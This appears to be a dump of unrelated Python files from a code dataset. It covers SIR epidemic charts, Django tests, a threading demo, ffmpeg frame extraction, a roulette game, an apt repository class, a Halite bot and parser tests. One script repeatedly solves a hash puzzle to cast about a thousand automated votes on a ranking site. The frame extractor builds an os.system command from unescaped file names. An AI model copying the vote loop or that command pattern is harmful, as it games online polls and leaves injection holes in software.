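# The k and sigma values below are illustrative only.
import numpy as np

alpha = 1.2564312086261696770
k, sigma = 2.0, 0.05
xopt = np.sqrt(alpha * k * sigma * sigma)
print(xopt, 5.0 * xopt)  # ~0.0793 and ~0.3963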
label=\"Recovered Prediction (decreasing beta)\",\n color=\"green\", linestyle='dotted')\n\n axis2.plot(predictionRange, futurePredictions[\"sirContinueTrend\"][1],\n label=\"Infected Prediction (continue beta trend)\", color=\"blue\", linestyle='solid')\n axis2.plot(predictionRange, futurePredictions[\"sirContinueTrend\"][2],\n label=\"Recovered Prediction (continue beta trend)\", color=\"blue\", linestyle='dotted')\n\n axis2.set_xlabel(\"Day Number\")\n axis2.set_ylabel(\"Number of Individuals\")\n # axis2.xticks(np.arange(0, tsSize + predictionDays, 10))\n axis2.xaxis.set_major_locator(plticker.MultipleLocator(base=10))\n axis2.xaxis.set_tick_params(rotation=60)\n axis2.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n axis2.legend()\n axis2.set_title(\"60 Day Predictions for \" + countryName + \" (Infected and Recovered)\", fontsize=\"xx-large\")\n # figure2.suptitle(\"60 Day Predictions for \" + countryName + \" (Infected and Recovered)\")\n\n\ndef createPredictionsBetaChart(predictionRange, futurePredictions, countryName):\n figure3, axis3 = plt.subplots()\n figure3.set_size_inches(7.5, 7.5)\n axis3.plot(predictionRange, futurePredictions[\"betaConstant\"], label=\"Constant beta\", color=\"red\")\n axis3.plot(predictionRange, futurePredictions[\"betaDownward\"], label=\"Decreasing beta\", color=\"green\")\n axis3.plot(predictionRange, futurePredictions[\"betaContinueTrend\"], label=\"Continue beta trend\", color=\"blue\")\n axis3.set_xlabel(\"Day Number\")\n axis3.set_ylabel(\"Transmission Rate\")\n # axis3.xticks(np.arange(tsSize - 1, tsSize + predictionDays, 5))\n axis3.xaxis.set_major_locator(plticker.MultipleLocator(base=5))\n axis3.xaxis.set_tick_params(rotation=60)\n axis3.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n axis3.legend()\n axis3.set_title(\"Prediction Beta Values for \" + countryName, fontsize=\"xx-large\")\n # figure3.suptitle(\"Prediction Beta Values for \" + countryName)\n\n\ndef createValidationChart(tsSize, fullData, cvPredictionDays, cvFullRange, cvTestRange, cvPredictions, countryName):\n figure4, axis4 = plt.subplots()\n figure4.set_size_inches(7.5, 7.5)\n # figure4.canvas.draw()\n\n axis4.axvspan(tsSize - cvPredictionDays - 1, tsSize, alpha=0.3, color='silver')\n # plt.plot(historicalRange, S)\n axis4.plot(cvFullRange, fullData[\"I\"], label=\"Infected (Confirmed Cases)\", color=\"black\", linestyle='solid',\n linewidth=3.5)\n axis4.plot(cvFullRange, fullData[\"R\"], label=\"Recovered (Deaths + Recovered Cases)\", color=\"black\",\n linestyle='dotted', linewidth=3.5)\n\n # plt.plot(predictionRange, SP1)\n axis4.plot(cvTestRange, cvPredictions[\"sirConstant\"][1], label=\"Infected Prediction (constant beta)\", color=\"red\",\n linestyle='solid')\n axis4.plot(cvTestRange, cvPredictions[\"sirConstant\"][2], label=\"Recovered Prediction (constant beta)\", color=\"red\",\n linestyle='dotted')\n\n axis4.plot(cvTestRange, cvPredictions[\"sirDownward\"][1], label=\"Infected Prediction (decreasing beta)\",\n color=\"green\", linestyle='solid')\n axis4.plot(cvTestRange, cvPredictions[\"sirDownward\"][2], label=\"Recovered Prediction (decreasing beta)\",\n color=\"green\", linestyle='dotted')\n\n axis4.plot(cvTestRange, cvPredictions[\"sirContinueTrend\"][1], label=\"Infected Prediction (continue beta trend)\",\n color=\"blue\", linestyle='solid')\n axis4.plot(cvTestRange, cvPredictions[\"sirContinueTrend\"][2], label=\"Recovered Prediction (continue beta trend)\",\n color=\"blue\", linestyle='dotted')\n\n axis4.set_xlabel(\"Day 
Number\")\n axis4.set_ylabel(\"Number of Individuals\")\n # axis2.xticks(np.arange(0, tsSize + predictionDays, 10))\n axis4.xaxis.set_major_locator(plticker.MultipleLocator(base=10))\n axis4.xaxis.set_tick_params(rotation=60)\n axis4.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n # axis4.xaxis.\n # print(\"Tick Labels = \" + str(axis4.get_xticklabels()))\n\n # axis_labels = [getFullTickLabel(int(q)) for q in axis4.get_xticks().tolist()]\n # print(axis_labels)\n # axis4.set_xlabels(axis_labels)\n # axis4.xticks(rotation=60)\n # $[getFullTickLabel(str(i)) for i in range(0, tsSize, 10)]\n # axis_labels = [item.get_text() for item in axis4.get_xticklabels()]\n # axis4.set_xticklabels(axis_labels)\n\n axis4.legend()\n axis4.set_title(\"Compare 30 Day Predictions vs. Actual for \" + countryName + \" (Infected and Recovered)\",\n fontsize=\"xx-large\")\n # figure2.suptitle(\"60 Day Predictions for \" + countryName + \" (Infected and Recovered)\")\n\n\ndef analyzeCountrySIR(tsData, countryName, chartSet, callShowPlot=True):\n tsSize = tsData.dateCount\n countryData = tsData.countryMap[countryName]\n countryPopulation = countryData.population\n futurePredictionDays = 60 # Arrays will be 31\n cvPredictionDays = 30\n\n fullData = util.getObservedModelValues(tsData, countryName)\n\n historicalRange = np.arange(tsSize)\n predictionRange = np.arange(tsSize - 1, tsSize + futurePredictionDays)\n\n futurePredictions = util.getStandardPredictions(tsData, countryName, 0, tsSize - 1, futurePredictionDays)\n cvPredictions = util.getStandardPredictions(tsData, countryName, 0, tsSize - cvPredictionDays - 1, cvPredictionDays)\n cvTrainRange = np.arange(0, tsSize - cvPredictionDays)\n cvTestRange = np.arange(tsSize - cvPredictionDays - 1, tsSize)\n cvFullRange = np.arange(0, tsSize)\n\n if \"HistoricalBetaChart\" in chartSet:\n createHistoricalBetaChart(historicalRange, fullData, countryName)\n\n if \"PredictionChart\" in chartSet:\n createPredictionChart(tsSize, futurePredictionDays, historicalRange, predictionRange, fullData,\n futurePredictions, countryName)\n\n if \"PredictionsBetaChart\" in chartSet:\n createPredictionsBetaChart(predictionRange, futurePredictions, countryName)\n\n if \"ValidationChart\" in chartSet:\n createValidationChart(tsSize, fullData, cvPredictionDays, cvFullRange, cvTestRange, cvPredictions, countryName)\n\n if callShowPlot:\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n tsData = common.getTimeSeriesData()\n\n # for i in range(tsData.countryCount):\n # countryName = tsData.countryIndex[i]\n # countryData = tsData.countryMap[countryName]\n # print(\"Country is: \" + countryName + \", and first case was: \" + str(tsData.dateIndex[countryData.firstIndex]))\n\n allCharts = {\"HistoricalBetaChart\", \"PredictionChart\", \"PredictionsBetaChart\", \"ValidationChart\"}\n\n # for c in [\"US\", \"Canada\", \"China\", \"Germany\", \"France\", \"Italy\", \"Brazil\", \"Russia\", \"Nigeria\", \"Mexico\"]:\n # analyzeCountrySIR(tsData, c, {\"HistoricalBetaChart\"}, False)\n\n #plt.show()\n\n analyzeCountrySIR(tsData, \"US\", allCharts, True)\n\n print(\"Done\")\n","sub_path":"src/AnalyzeTransmissionRates.py","file_name":"AnalyzeTransmissionRates.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"376429719","text":"from django.db import models\nfrom django_fsm_ex import ConcurrentTransitionMixin, transition, FSMField, ConcurrentTransition\n\nimport 
pytest\npytestmark = pytest.mark.django_db\n\nclass LockedBlogPost(ConcurrentTransitionMixin, models.Model):\n state = FSMField(default='new', protected=True)\n text = models.CharField(max_length=50)\n\n @transition(field=state, source='new', target='published')\n def publish(self):\n pass\n\n @transition(field=state, source='published', target='removed')\n def remove(self):\n pass\n\n class Meta:\n app_label = 'testapp'\n\n\nclass ExtendedBlogPost(LockedBlogPost):\n review_state = FSMField(default='waiting', protected=True)\n notes = models.CharField(max_length=50)\n\n @transition(field=review_state, source='waiting', target='rejected')\n def reject(self):\n pass\n\n class Meta:\n app_label = 'testapp'\n\n\ndef test_create_succeed():\n LockedBlogPost.objects.create(text='test_create_succeed')\n\ndef test_crud_succeed():\n post = LockedBlogPost(text='test_crud_succeed')\n post.publish()\n post.save()\n\n post = LockedBlogPost.objects.get(pk=post.pk)\n assert ('published' == post.state)\n post.text = 'test_crud_succeed2'\n post.save()\n\n post = LockedBlogPost.objects.get(pk=post.pk)\n assert ('test_crud_succeed2' == post.text)\n\ndef test_save_and_change_succeed():\n post = LockedBlogPost(text='test_crud_succeed')\n post.publish()\n post.save()\n\n post.remove()\n post.save()\n\ndef test_concurent_modifications_raise_exception():\n post1 = LockedBlogPost.objects.create()\n post2 = LockedBlogPost.objects.get(pk=post1.pk)\n\n post1.publish()\n post1.save()\n\n post2.text = 'aaa'\n post2.publish()\n with pytest.raises(ConcurrentTransition):\n post2.save()\n\ndef test_inheritance_crud_succeed():\n post = ExtendedBlogPost(text='test_inheritance_crud_succeed', notes='reject me')\n post.publish()\n post.save()\n\n post = ExtendedBlogPost.objects.get(pk=post.pk)\n assert ('published' == post.state)\n post.text = 'test_inheritance_crud_succeed2'\n post.reject()\n post.save()\n\n post = ExtendedBlogPost.objects.get(pk=post.pk)\n assert ('rejected' == post.review_state)\n assert ('test_inheritance_crud_succeed2' == post.text)\n","sub_path":"tests/testapp/tests/test_lock_mixin.py","file_name":"test_lock_mixin.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"481710506","text":"from threading import *\nfrom time import *\n\nclass Producer:\n def __init__(self):\n self.products =[]\n self.ordersplaced = False\n\n def produce(self):\n\n for i in range(1, 5):\n self.products.append(\"Product_\" + str(i))\n sleep(1)\n print(\"Product added\")\n\n self.ordersplaced = True\n print(\"Orders placed\")\n\nclass Consumer:\n def __init__(self, prod):\n self.prod = prod\n\n def consume(self):\n while self.prod.ordersplaced == False:\n print(\"Waiting for the orders\")\n sleep(0.4)\n\n print(\"Orders shipping \", self.prod.products)\n\np = Producer()\nc = Consumer(p)\n\n#Consumer thread\nct = Thread(target=c.consume)\nct.start()\n\n#Producer thread\npt = Thread(target=p.produce)\npt.start()","sub_path":"Python/Udemy_PythonCoreAdvanced/multithreading/threadcommunicationusingflag.py","file_name":"threadcommunicationusingflag.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"609154528","text":"'''\niframe_extract.py - download video and ffmpeg i-frame extraction\nUsage: \n(ex) python iframe_extract.py -u https://www.youtube.com/watch?v=dP15zlyra3c\nThis code does two things:\n1. Download using youtube-dl\n2. 
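# The producer/consumer record above polls a boolean flag in a sleep loop,
# which wastes cycles; a common alternative (not the original author's code)
# is threading.Event, which lets the consumer block until the producer
# signals. Self-contained sketch:
from threading import Thread, Event

orders_placed = Event()
products = []

def produce():
    for i in range(1, 5):
        products.append("Product_" + str(i))
    orders_placed.set()          # wake any waiting consumers

def consume():
    orders_placed.wait()         # blocks instead of polling
    print("Orders shipping", products)

ct, pt = Thread(target=consume), Thread(target=produce)
ct.start(); pt.start(); ct.join(); pt.join()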
Extract i-frames via ffmpeg\n'''\n\nfrom __future__ import unicode_literals\nfrom moviepy.video.io.VideoFileClip import VideoFileClip\nimport sys\nimport os\nimport subprocess\nimport argparse\n\n# -s : size\n\ndef iframe_extract(inFile,outFolder):\n\n# extract i-frame using ffmpeg\n# ffmpeg -i inFile -f image2 -vf \\\n# \"select='eq(pict_type,PICT_TYPE_I)'\" -vsync vfr oString%03d.png\n\n # infile : video file name \n # (ex) 'FoxSnowDive-Yellowstone-BBCTwo.mp4'\n\n #create folder per each file\n with open('frame_log.log','a+') as f:\n inFile = '\"' + inFile.replace('/', '\"/\"') + '\"'\n tempIn = inFile.split('/')[-1]\n outFolder = outFolder + '/' + tempIn\n \n f.write(\"outFolder : \" + outFolder + \"\\n\")\n f.write(\"inFile : \" + inFile + \"\\n\\n\")\n\n if not os.path.exists(outFolder):\n os.mkdir(outFolder)\n \n # start extracting i-frames\n inFile = inFile.replace('\"','')\n clip = VideoFileClip(inFile)\n movie_length = int(clip.duration)\n\n if int(movie_length * 0.05) >= 300:\n start = 300\n end = movie_length-300\n else:\n start = int(movie_length * 0.05)\n end = movie_length - (movie_length * 0.05) \n\n try:\n if os.path.isfile(inFile):\n imgFilenames = outFolder + '/%05d.png'\n cmd = [\"ffmpeg\",'-i', inFile,'-f', 'image2','-vf',\n \"select='eq(pict_type,PICT_TYPE_I)'\",'-vsync','vfr',\n '-ss', str(start), '-t', str(end), imgFilenames]\n # create iframes\n subprocess.call(cmd)\n \n elif os.path.isdir(inFile):\n for file in os.listdir(inFile):\n eachFolder = file.replace(\" \",\"\")\n eachFolder = eachFolder.replace(\"'\",\"\")\n\n try:\n if not os.path.exists(outFolder + \"/'\" + eachFolder + \"'\"):\n os.system(\"mkdir \"+ outFolder + \"/'\" + eachFolder + \"'\")\n except:\n pass\n\n imgFilenames = outFolder + \"/\" + eachFolder + \"/%05d.png\"\n\n cmd = [\"ffmpeg\",'-i', os.path.join(inFile,file), '-f', 'image2','-vf',\n \"select='eq(pict_type,PICT_TYPE_I)'\",'-vsync','vfr',\n '-ss', str(start), '-t', str(end), imgFilenames]\n\n # create iframes\n subprocess.call(cmd)\n else:\n print(inFile)\n except Exception as e:\n print(e)\n\n\ndef check_arg(args=None):\n\n# Command line options\n# If a path contains blank, you should add ''\n\n parser = argparse.ArgumentParser(description='extract iframe from downloaded video')\n '''\n parser.add_argument('-u', '--url',\n help='download url',\n )\n '''\n parser.add_argument('-o', '--outfolder',\n help='output folder name for iframe images')\n parser.add_argument('-i', '--infile',\n help='input to iframe extract')\n\n results = parser.parse_args(args)\n return (results.infile, results.outfolder)\n\n'''\nUsage sample:\n syntax: python iframe_extract.py -i path -o path\n'''\n\nif __name__ == '__main__':\n i,o = check_arg(sys.argv[1:])\n #changed_frame_extract(i)\n iframe_extract(i,o)\n","sub_path":"iframe_extraction.py","file_name":"iframe_extraction.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"184402664","text":"#Precondition: You have a certain amount of bets you can place with a certain amount of money\n#Postcondition: The amount of money you win is displayed on the screen with all of your winnings\n#Purpose: To bet as much money as you have and win as much as possible \n\n\n\n\n#import your functions needed\nfrom random import *\nfrom math import *\n\n\n#function1: get_number_to_bet_on() \n#purpose: Asking user for the number they want to bet on\n#preconditions: None \n#postconditions: returns integer\n#Call the function\ndef 
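# Stripped-down version of the ffmpeg invocation that iframe_extract builds
# above: keep only I-frames and write numbered PNGs. The file names are
# placeholders and ffmpeg must be on PATH.
import subprocess

cmd = ["ffmpeg", "-i", "input.mp4", "-f", "image2",
       "-vf", "select='eq(pict_type,PICT_TYPE_I)'", "-vsync", "vfr",
       "out_%05d.png"]
# subprocess.call(cmd)  # uncomment to run against a real input.mp4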
get_a_number_to_bet_on():\n #1. ask the user to enter a bet from 0-36\n betnum = int(input(\"What number do you want to bet on? (0-36) \"))\n #2. if number is not in range ask to bet again\n while betnum not in range(0,37):\n print(\"Bet again\")\n betnum = int(input(\"What number do you want to bet on? (0-36) \"))\n #3. save this bet for the later functions\n return betnum\n \n \n \n \n#function2: get_amount_to_bet\n#purpose: asks the user for an amount to bet\n#preconditions: = Parameters \n#postconditions: returns integer\n#Call the function\ndef get_amount_to_bet(pot):\n #1. ask user for a bet amount\n bet=int(input(\"How much do you want to bet ? \"))\n #2. continue if bet is in range; if it is not, tell the user it isn't\n while bet not in range(0,pot):\n print(\"That is too much!\")\n #3. ask the user again for a bet in range\n bet=int(input(\"How much do you want to bet ? \"))\n return bet\n \n \n \n \n#function3: get_choice\n#purpose: offers the user a choice of two characters or N, with a label and returns the character they entered\n#preconditions: = 3 choices that the user can pick from some of the bets \n#postconditions: returns only the upper case letters \n#Call the function\ndef get_choice(firstchoice,secondchoice,c):\n #1. ask user to choose what they want\n inputstring= (\"Do you want to bet on \" + c) \n #2. all of the inputs should be returned as upper case with x.upper()\n choice = input(inputstring).upper()\n while choice != firstchoice and choice != secondchoice and choice != \"N\":\n print(\"Not a valid answer\")\n choice = input(inputstring).upper()\n #Return choice for later\n return(choice)\n \n \n\n\n#function4: get_randnum()\n#purpose: this function will call the random number generator to get a random number in the right range\n#preconditions: = Parameters \n#postconditions: returns an integer\n#Call the function\ndef get_randnum():\n #2. get the random input for their bets\n random=randrange(0,37)\n return random\n\n\n\n\n#function5: display_spin\n#purpose: This will display the number the ball lands on \n#preconditions: = Random number generated \n#postconditions: returns integer \n#Call the function\ndef display_spin (random):\n #1. Once the random number is generated display the display_spin\n print(\"Spinning ... .1. 2. 3. 4... And the number is \",random)\n \n \n\n\n#function6: get_and_report_winnings\n#purpose: this function will return the amount the player won \n#preconditions: = Parameters \n#postconditions: returns values, output, changes to parameter\n#Call the function\ndef get_and_report_winnings(bet,betnum,pot,random,firstchoice,secondchoice,thirdchoice):\n tot=0\n if betnum == random:\n tot += bet *5\n #1. Tell the user the amount of winnings they won\n print(\"You win 5 times your bet! You hit the number!\",tot)\n else:\n #2. if you did not win display no penalty\n print(\"You did not get the number, no penalty \")\n \n if firstchoice != \"N\":\n #3.0 Display if it was even or odd\n #3.1 if even or odd add 2 x to your bet\n if (random % 2 == 0 and firstchoice == 'E') or (random % 2 == 1 and firstchoice == \"O\"):\n tot+= 2 * bet\n firstchoice= 2 * bet\n print(\"You win two times your bet on odd/even! 
\", firstchoice)\n else: \n #3.2 if else take bet amount away from your pot\n tot-= bet\n firstchoice = bet\n print(\"you lost your bet on odd or even.\",firstchoice)\n #4.0 Display if it was red/black \n if secondchoice != \"N\":\n if (random % 3 == 0 and secondchoice == 'R') or (random % 3 > 0 and secondchoice == \"B\"):\n #4.1 if red or black add 3 x your bet\n tot+= 3 * bet\n secondchoice = 3 * bet\n print(\"You won three times your bet on red/black!\",tot)\n else:\n #4.2 if else take bet amount away from your pot\n tot-= 2 * bet\n secondchoice= 2 * bet\n print(\"You lose 2 times your bet.\",secondchoice)\n #5.0 Display if it was high, low or no bet\n if thirdchoice != \"N\":\n #5.1 if number<=18 then low if number>18 then high\n if (random > 18 and thirdchoice == \"H\") or (random < 18 and thirdchoice == \"L\"):\n #5.2 if you win high or low add bet amount to pot\n tot+= bet\n thirdchoice= bet\n print(\"You win your bet\", thirdchoice)\n else: \n #5.3 if else subtract bet amount from pot\n tot-= bet\n thirdchoice= bet\n print(\"You lost your bet on high/low\", thirdchoice)\n return tot\n \n \n \n \n#function7: get_y_or_n ()\n#purpose: this function asks the user a question about playing again and returns either an uppercase y or an uppercase n\n#preconditions: = No Parameters \n#postconditions: returns has to be uppercase y or uppercase n\n#Call the function\ndef get_y_or_n():\n #1.Display \"Do you want to play again?\" \n play=input(\"Do you want to play again? (y/n) \").upper()\n #2. choices of (y/n)\n while play != 'N' and play!= 'Y':\n #3. display choice of y/n if not a answer\n print(\"Not a answer\")\n play=input(\"Do you want to play again? (y/n) \").upper()\n return play\n \n \n \n\n\n\n\n\n\n\n#1. Main function \"def main:()\"\ndef main ():\n print()\n #2. display introductory message Spin and win! Big Blue Roulette!!!\n print(\"Spin and Win!!! Big Blue Roulette!!!\")\n #2.1 Dispay how much money they have \"$100\"\n pot= 100\n end= \"Y\"\n #3. Tell user how much there pot is\n print(\"Your pot is \",\"$\",pot,sep=\"\")\n print() \n #3.1 initialize pot, play flag\n while pot>0 and end == \"Y\":\n #4. Ask the user what number they want to bet on\n betnum = get_a_number_to_bet_on()\n #5. Call get_amount_to_bet\n bet=get_amount_to_bet(pot)\n #6. Call get_choice to offer them even/odd/no bet\n firstchoice = get_choice(\"E\", \"O\",\"even/odd/no bet? (E/O/N) \")\n #7. Call get_choice to offer them red/black/no bet (R/B/N)\n secondchoice = get_choice(\"R\",\"B\", \"red/black/no bet? (R/B/N) \")\n #8. Call get_choice to offer them high/low/no bet\n thirdchoice = get_choice(\"H\",\"L\",\"high/low/no bet? (H/L/N \")\n #9. Call get_randnum() to get the random integer of there bets\n random = get_randnum()\n print()\n #10. Call display_spin to display the random number\n display_spin(random) \n print()\n #11. After all the bets display total amount of pot after all of wins\n # and losses have been calculated. You win $....(amount)\n #11.1 Report total winnings \n tot = get_and_report_winnings(bet,betnum,pot,random,firstchoice,secondchoice,thirdchoice,choice)\n pot = pot + tot\n print(\"Now you have $\",pot)\n print()\n #12.0 If pot is less then 0 game is over\n if pot < 0:\n end = get_y_or_n() \n else:\n #12.1 Call get_y_or_n ()\n end = get_y_or_n()\n #13.0 Display you left the game with $(amount) because you quit\n print(\"Thanks for playing! You left the game with $\", pot)\n print()\n \n#14. 
End with main \nmain()\n","sub_path":"project/RussianRoulette2.py","file_name":"RussianRoulette2.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"536425332","text":"import gzip\n\nfrom depot.apt import AptPackage, AptPackages\n\nclass Repository(object):\n def __init__(self, storage):\n self.storage = storage\n\n def create(self):\n raise NotImplementedError\n\n def add_package(self, path):\n raise NotImplementedError\n\n def remove_package(self, package_id):\n raise NotImplementedError\n\n\nclass AptRepository(Repository):\n def add_package(self, path, codename, component='main', arch=None):\n pkg = AptPackage(path)\n # Check that we have an arch if needed\n if pkg['architecture'] == 'any':\n if not arch:\n raise ValueError('Architecture required when adding packages for \"any\"')\n else:\n arch = pkg['architecture']\n\n # Stream up the actual package file\n self.storage.upload(pkg.pool_path, open(path, 'rb'))\n\n # Update the Packages file\n packages_path = 'dists/{0}/{1}/binary-{2}/Packages'.format(codename, component, arch)\n packages = AptPackages(self.storage.download(packages_path, skip_hash=True) or '')\n packages.add(pkg, self.storage.hashes(pkg.pool_path))\n packages_raw = str(packages)\n self.storage.upload(packages_path, packages_raw)\n # Packages.gz must be a real gzip stream (zlib.compress would emit a bare\n # zlib stream, and it needs bytes rather than str anyway)\n self.storage.upload(packages_path+'.gz', gzip.compress(packages_raw.encode()))\n\n # Update\n","sub_path":"depot/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"517932412","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date\nimport hashlib\n\ndef cul_md5(vote):\n today = date.today()\n orc_code = \"%d%.2d%.2dKIDJourney%d\" % (today.year , today.month , today.day , vote)\n number = 0\n while True :\n temp = orc_code + str(number)\n if hashlib.md5(temp.encode()).hexdigest()[:6] == '000000' :\n return str(number)\n else :\n number += 1\n\ndef post_vote(hash_string):\n url = \"http://www.qlcoder.com/train/handsomerank\"\n soup = BeautifulSoup(requests.get(url).text, 'html.parser')\n token = soup.find('input' , {'type':'hidden'}).get('value')\n post_data = {\"_token\":token , \n 'name':'KIDJourney',\n 'checkcode' : hash_string}\n # the form has to be submitted with POST, not GET\n response = requests.post(url , data=post_data)\n print(response.text)\n\nif __name__ == \"__main__\" :\n for i in range(4,1006):\n post_vote(cul_md5(i))","sub_path":"qlcoder/7581(2).py","file_name":"7581(2).py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"409058876","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'),\n path('reserva/', reserva, name='reserva'),\n path(\"envio\", recuperar, name='envio'),\n path('registro/', registro, name='registro'),\n path('envio2/', envio2, name='envio2'),\n path('envio3/', envio3, name='envio3'),\n path('sesion/', sesion, name='sesion'),\n path('local/', local, name='local'),\n]","sub_path":"Tarea3TICS/grupo15prim/miapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"616086952","text":"import hlt\nfrom hlt import NORTH, EAST, SOUTH, WEST, STILL, Move, Square\nimport random\n\nmyID, game_map = hlt.get_init()\nstartdir = 0\n \n#init\nf = open(\"lastlog.log\", 
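# cul_md5 in the record above is a small md5 proof-of-work search: append an
# increasing counter to a fixed prefix until the digest starts with six zero
# hex digits. Generic restatement with a shorter 4-zero target so it finishes
# in well under a second; the prefix is arbitrary.
import hashlib

def find_nonce(prefix, target="0000"):
    n = 0
    while True:
        digest = hashlib.md5((prefix + str(n)).encode()).hexdigest()
        if digest.startswith(target):
            return n, digest
        n += 1

print(find_nonce("demo"))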
'w')\ninits = []\nids = []\nmyStart = None\nfor s in game_map:\n if s.owner == myID:\n myStart = s\n if not s.owner in ids and s.owner != myID and s.owner != 0:\n ids.append(s.owner)\n inits.append(s)\nclosest = inits[0]\nfor n in inits[1:]:\n if game_map.get_distance(myStart, n) < game_map.get_distance(myStart, closest):\n closest = n\n\nvalues = {}\nfor s in game_map:\n if abs(s.x - myStart.x) > 4 or abs(s.y - myStart.y) > 4:\n continue\n values[s] = s.production*30 - s.strength\ntargets = values.keys()\ntarget = None\nfor s in targets:\n if target == None or values[s] > values[target]:\n target = s\nf.write(str(target) + '\\n')\nglobal done\ndone = False\nx = target.x\ny = target.y\nf.write(\"%d, %d\\n\" % (x, y))\nf.close()\n\ndef move(s):\n global framenum\n if s.strength < s.production * 5:\n return Move(s, STILL)\n\n for d, n in enumerate(game_map.neighbors(s)):\n if s.strength > n.strength and n.owner != myID:\n return Move(s, d)\n\n side = 0\n dist = None\n ns = game_map.neighbors(s)\n for d, n in enumerate(ns):\n ctr = 1\n strength = 0\n prod = 0\n enemy = False\n while n.owner == myID and ctr < 45:\n ctr += 1\n n = game_map.get_target(n, d)\n strength = n.strength\n prod = n.production\n enemy = n.owner != 0 and n.owner != myID\n if framenum < 100:\n ctr -= prod/3\n ctr += strength/50\n else:\n ctr -= prod/2\n ctr += strength/70 \n if enemy:\n ctr -= 2\n if dist == None or ctr < dist:\n dist = ctr\n side = d\n n = game_map.get_target(s, side)\n if n.owner != myID and n.strength > s.strength:\n return Move(s, STILL)\n return Move(s, side)\n\ndef move_early(s):\n global done\n if s.x == x and s.y == y:\n done = True\n if done:\n return move(s)\n go = 0\n t = None\n wait = 15\n for d, n in enumerate(game_map.neighbors(s)):\n if game_map.get_distance(target, n) < game_map.get_distance(target, s):\n if t != None and t.strength < n.strength:\n continue\n go = d\n t = n\n if n.owner == myID:\n wait = 5\n if t.strength < s.strength and t.owner != myID:\n return Move(s, go)\n if s.strength < s.production * wait:\n return Move(s, STILL)\n return Move(s, go)\n\n#execute\nhlt.send_init(\"DistanceBot_fighter\")\nglobal framenum\nframenum = 0\nwhile True:\n global framenum\n game_map.get_frame()\n framenum += 1\n if done:\n moves = [move(s) for s in game_map if s.owner == myID]\n else:\n moves = [move_early(s) for s in game_map if s.owner == myID] \n hlt.send_frame(moves)\n","sub_path":"MyBot.py","file_name":"MyBot.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"631427002","text":"#!/usr/bin/env python3\n\n\"\"\" Usage:\n\n python3 -m unittest -v test\n\"\"\"\n\nimport unittest\nfrom boolsheet import BoolSheet\nfrom exceptions import (\n BoolSheetSymbolError,\n BoolSheetOperandError,\n BoolSheetParenthesesError,\n BoolSheetVariableError)\n\n\nclass TestBoolSheet(unittest.TestCase):\n def test_to_lst_method(self):\n \"\"\" Test the method to_lst()\n \"\"\"\n\n # Allowed expression\n result = BoolSheet('~(A + B)C').to_lst()\n self.assertEqual(result, ['~', '(', 'A', '+', 'B', ')', 'C'])\n\n def test_check_symbols(self):\n \"\"\" Test the method _check_symbols()\n \"\"\"\n\n # Check for variables\n result = BoolSheet('~(+)')\n with self.assertRaises(BoolSheetVariableError):\n result._check_symbols()\n\n # Not allowed symbol '*'\n result = BoolSheet('~(A + B)*C')\n with self.assertRaises(BoolSheetSymbolError):\n result._check_symbols()\n\n def test_check_operands(self):\n \"\"\" Test the method 
_check_operands()\n \"\"\"\n\n # Not allowed operand '~+'\n result = BoolSheet('~(A ~+ B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed operand '~)'\n result = BoolSheet('~(A + B~)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed operand '++'\n result = BoolSheet('~(A ++ B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed operand '(+'\n result = BoolSheet('~(+A + B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed start with '+'\n result = BoolSheet('+~(A + B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed end with '+'\n result = BoolSheet('~(A + B)C+')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed end with '~'\n result = BoolSheet('~(A + B)C~')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n def test_check_parentheses(self):\n \"\"\" Test the method _check_parentheses()\n \"\"\"\n\n # Check parentheses nest misused\n result = BoolSheet('~(A ~+ B))C')\n with self.assertRaises(BoolSheetParenthesesError):\n result._check_parentheses()\n\n # Check parentheses nest misused\n result = BoolSheet('~)(A ~+ B)C(')\n with self.assertRaises(BoolSheetParenthesesError):\n result._check_parentheses()\n\n def test_to_lst(self):\n \"\"\" Test the method to_lst()\n \"\"\"\n\n # Test string to list conversion\n result = BoolSheet('~(A + B)CA').to_lst()\n self.assertEqual(result, ['~', '(', 'A', '+', 'B', ')', 'C', 'A'])\n\n def test_nest_parentheses(self):\n \"\"\" Test the method nest_parentheses()\n \"\"\"\n\n # Test correct nested parentheses\n bs = BoolSheet('~(A + B)(CA)')\n result = bs.nest_parentheses(bs.expstr)[1]\n self.assertEqual(result, ['~', ['A', '+', 'B'], ['C', 'A']])\n\n def test_complement(self):\n \"\"\" Test the method 